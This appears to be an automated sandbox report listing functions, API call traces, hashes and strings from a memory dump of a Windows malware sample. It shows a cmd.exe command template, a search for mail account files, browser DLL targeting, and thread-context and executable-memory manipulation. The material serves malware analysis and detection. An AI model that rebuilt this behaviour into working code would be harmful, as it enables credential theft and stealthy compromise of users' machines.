  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: cmd.exe Analysis ID: 56191

General

Root Process Name:d3d8sext.exe
Process MD5:AD7B9C14083B52BC532FBA5948342B98
Total matches:133
Initial Analysis Report:Open
Initial sample Analysis ID:56191
Initial sample SHA 256:2E3314E18462E1F0BB2C45D2DBECEF96FD049065BF74CD54261CE72B15FE4F13
Initial sample name:Jf253cgaQa.exe

Similar Executed Functions

Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
